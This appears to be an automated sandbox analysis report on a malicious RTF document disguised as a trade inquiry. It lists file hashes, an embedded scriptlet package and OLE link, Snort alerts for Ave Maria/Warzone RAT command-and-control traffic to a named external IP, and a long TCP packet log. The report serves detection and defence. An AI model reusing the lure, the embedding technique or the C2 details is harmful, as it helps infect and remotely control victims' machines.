Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...MP................0.................. ... ....@.. .......................@............@.................................0...O.... ..X.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...X.... ......................@..@.reloc....... ......................@..B................d.......H.......$....X......6.......p.............................................s}...}......}.....(.......(.......0...........s......o......(........0............{....o....r...p(....,..{....o....r...p(....,..{....o....r...p(....+....9......{....o.....{....o....(......,W..{.....{....o.....{....o....o\|.....,#.r...p(....&s......o......(......+.r)..p(....&.+.rK..p(....&.r...p(....&....0..+.........,..{.......+....,...{....o........(.......0............s....}.....s....}.....s....}..

C:\Users\user\Desktop\~$em Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
MD5:	7CFA404FD881AF8DF49EA584FE153C61
SHA1:	32D9BF92626B77999E5E44780BF24130F3D23D66
SHA-256:	248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
SHA-512:	F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...

Static File Info

General

File type:	Rich Text Format data, version 1, unknown character set
Entropy (8bit):	3.0298782156742794
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc
File size:	221545
MD5:	9bc102ffb0930f5dee65bde8e0ba6d89
SHA1:	37cac7507a6ad02a75d947a9bdfe115f2da8b71b
SHA256:	959837140aee207e9fd845a030881f9430364d2df8088845f5828579420b1717
SHA512:	acdb50e95c30e14b235a89ed4a86531a64c1c3246b3d65a116a80e64a6f9d061c7a2dc784b9942cf1beb5d7fbdd6302139347a490886386d54c0dc372404e0fd
SSDEEP:	1536:9mDDRxjrfUG7NP0UlAD8KEmt09N/FUr1nvX+EEFZVzFz76mAg5eeVhMDw5wfLz:94F1lVzFtr5RDAw5wfP
TLSH:	5824B9B4694F08B2C309DC1E25A87655AE79FEA374C154B223AFE034CF5ABF29EC4541
File Content Preview:	{\rtf1\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\fnhsfBi58207\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c667364

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	000007D1h	2	embedded	package	15065	DZdtfhgYgeghD{.scT	C:\osdsTggH\DZdtfhgYgeghD{.scT	C:\9jkepaD\DZdtfhgYgeghD{.scT	no
1	00008329h	2	embedded	OLE2LInk	2560				no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
20.126.95.155192.168.2.227800491732852329 09/23/22-08:15:52.235686	TCP	2852329	ETPRO TROJAN Ave Maria/Warzone RAT PingCommand	7800	49173	20.126.95.155	192.168.2.22
20.126.95.155192.168.2.227800491732852326 09/23/22-08:15:32.226881	TCP	2852326	ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket	7800	49173	20.126.95.155	192.168.2.22
192.168.2.2220.126.95.1554917378002852328 09/23/22-08:15:32.237815	TCP	2852328	ETPRO TROJAN Ave Maria/Warzone RAT PingResponse	49173	7800	192.168.2.22	20.126.95.155
20.126.95.155192.168.2.227800491732036735 09/23/22-08:13:32.180190	TCP	2036735	ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)	7800	49173	20.126.95.155	192.168.2.22
192.168.2.2220.126.95.1554917378002036734 09/23/22-08:15:32.237815	TCP	2036734	ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin	49173	7800	192.168.2.22	20.126.95.155
192.168.2.2220.126.95.1554917378002852327 09/23/22-08:13:32.470320	TCP	2852327	ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse	49173	7800	192.168.2.22	20.126.95.155

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 23, 2022 08:13:01.808065891 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.839801073 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.839961052 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.840199947 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.870269060 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.870949984 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.870994091 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.871057987 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.871066093 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.871123075 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.871141911 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.871172905 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.871212959 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.871246099 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.871253967 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.871256113 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.871282101 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.871296883 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.871320009 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.871339083 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.871364117 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.871407986 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.871417999 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.871483088 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.875750065 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903110981 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903160095 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903203011 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903204918 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903249025 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903278112 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903285027 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903287888 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903316021 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903328896 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903358936 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903414965 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903453112 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903493881 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903522968 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903544903 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903660059 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903698921 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903738022 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903743029 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903772116 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903779984 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903806925 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903819084 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903845072 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903873920 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.903934002 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903973103 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.903995991 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.904012918 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.904035091 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.904071093 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.904133081 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.904175043 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.904205084 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.904215097 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.904238939 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.904256105 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.904273987 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.904293060 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.905054092 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.933777094 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.933832884 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.933871984 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.933908939 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.933921099 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.933937073 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.933968067 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.933986902 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934010983 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934030056 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934055090 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934072971 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934108973 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934117079 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934150934 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934171915 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934195995 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934216022 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934235096 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934257030 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934274912 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934293032 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934315920 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934338093 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934357882 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934379101 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934400082 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934417963 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934438944 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934463978 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934478045 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934497118 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934519053 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934541941 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934557915 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934597015 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934597015 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934621096 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934659004 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934662104 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934679031 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934698105 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934746027 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934761047 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934804916 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934838057 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.934895992 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934911013 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.934979916 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935022116 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935061932 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935071945 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.935091972 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.935125113 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.935146093 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935226917 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.935338020 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935414076 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935440063 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.935487986 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.935509920 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935560942 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935585022 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.935626030 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.935652018 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935735941 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.935899973 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.935971975 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.936440945 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.936526060 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.936592102 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.936665058 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.937300920 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.937467098 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.937654018 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.937671900 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.937849045 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.958165884 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.965816975 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.965843916 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.965898037 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.965960026 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.967613935 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.967704058 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.967731953 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.967760086 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.967783928 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.967808008 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.967830896 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.967789888 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.967859030 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.967861891 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.967885017 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.967885971 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.967909098 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.967914104 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.967917919 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.967947960 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.969528913 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.969552040 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.969568968 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.969589949 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.969634056 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.969660044 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.969665051 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.969683886 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.969747066 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.969752073 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.969782114 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.969851017 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.969883919 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988301992 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988338947 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988369942 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988387108 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988401890 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988429070 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988439083 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988451004 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988451958 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988461018 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988468885 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988476038 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988497972 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988518953 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988523960 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988539934 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988540888 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988549948 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988559008 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988563061 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988580942 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988601923 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988622904 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988637924 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988642931 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988652945 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988665104 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988666058 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988676071 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988687038 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988688946 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988709927 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988730907 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988727093 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988748074 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988753080 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988759041 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988774061 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988791943 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988795996 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988811016 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988821983 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988822937 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988843918 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988851070 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988867044 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988867998 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988874912 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988890886 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988898039 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988910913 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988913059 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988924980 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988935947 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988960028 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.988970041 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.988989115 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.989007950 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.989207029 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.989602089 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.996053934 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.996078014 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.996098042 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.996118069 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.996133089 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.996174097 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.996181965 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.996187925 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.997864008 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.997885942 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.997906923 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.997927904 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.997945070 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.997948885 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.997961998 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.997968912 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.997975111 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.997986078 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.997993946 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.997997046 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.998016119 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:01.998025894 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.998037100 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:01.998070955 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.000354052 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.000399113 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.000427008 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.000458002 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.000478983 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.000500917 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.000521898 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.000545979 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.000545979 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.000560999 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.000566959 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.000571012 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.000597954 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.000607014 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.000618935 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.000670910 CEST	49171	80	192.168.2.22	159.223.2.212
Sep 23, 2022 08:13:02.019082069 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019133091 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019174099 CEST	80	49171	159.223.2.212	192.168.2.22
Sep 23, 2022 08:13:02.019185066 CEST	49171	80	192.168.2.22	159.223.2.212
